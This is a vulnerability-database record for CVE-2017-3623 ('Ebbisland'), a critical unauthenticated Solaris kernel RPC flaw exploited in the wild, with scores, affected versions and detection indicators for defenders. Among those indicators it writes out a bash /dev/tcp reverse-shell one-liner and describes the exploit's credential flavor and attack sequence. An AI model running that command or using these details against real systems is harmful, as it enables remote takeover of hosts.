CVE-2017-3623
published 2017-04-24


Priority: P1 · 85 · critical · CVSS 3.0 base score 10
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
ITW exploit · VulnCheck KEV · Exploited in the wild
EPSS: 21.80% (97.3th percentile)
Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Kernel RPC). For supported versions that are affected see note. Easily "exploitable" vulnerability allows an unauthenticated attacker with network access via multiple protocols to compromise Solaris. While the vulnerability is in Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Solaris. Note: CVE-2017-3623 is assigned for "Ebbisland". Solaris 10 systems which have had any Kernel patch installed after, or been updated via patching tools since, 2012-01-26 are not impacted. Also, any Solaris 10 system installed with Solaris 10 1/13 (Solaris 10 Update 11) is not vulnerable. Solaris 11 is not impacted by this issue. CVSS 3.0 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).

Affected (1 range)

Vendor: oracle_corporation
Product: solaris_operating_system
Version range: (not listed on this record)
Fixed in: (not listed on this record)

Detection & IOCs (extracted from sources)

Indicator (other): AUTH_LOOPBACK (0x55de)
Indicator (other): RPC program number 100024 (status) over TCP
  • Detect RPC CALL packets using the AUTH_LOOPBACK credential flavor (0x55de) arriving from external/non-loopback sources; this is the exploit's credential type used to trigger the kernel RPC buffer overflow.
  • Alert on RPC NULL procedure calls (proc=0) to RPC program 100024 (status service) over TCP that are immediately followed by a second connection with an oversized AUTH_LOOPBACK credential: the exploit first 'pings', then attacks.
  • Look for reverse shell activity spawning bash with a '-c' argument containing a /dev/tcp redirect, as the shellcode executes: bash -i >& /dev/tcp/<lhost>/<lport> 0>&1
  • Solaris 10 systems that have NOT had any Kernel patch installed after 2012-01-26 and are NOT running Solaris 10 1/13 (Update 11) are vulnerable; Solaris 11 is not affected. Scope asset inventory accordingly.
  • If an RPC service crashes repeatedly after receiving oversized AUTH_LOOPBACK credential packets, it may be automatically disabled by inetd; monitor for unexpected RPC service restarts or disablement as a post-exploitation indicator.
  • The exploit targets IBM AIX PPC in addition to Solaris; the CVE was originally assigned for Solaris, but the exploit code demonstrates applicability to AIX versions 6100-09-04-1441, 7100-03-05-1524, 7100-04-00-0000, and 7200-01-01-1642.
  • The exploit requires the attacker to supply correct gid_base, execl_func, and execl_toc values specific to the target system, meaning exploitation is target-architecture-dependent and not fully generic without reconnaissance.
  • The exploit shellcode requires /usr/bin/bash to be present on the target system.

CVSS provenance

Source: nvd · v3.0 · 10.0 · CRITICAL · CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Source: nvd · v2.0 · 10.0 · CRITICAL · AV:N/AC:L/Au:N/C:C/I:C/A:C
Source: vulncheck · 10.0 · CRITICAL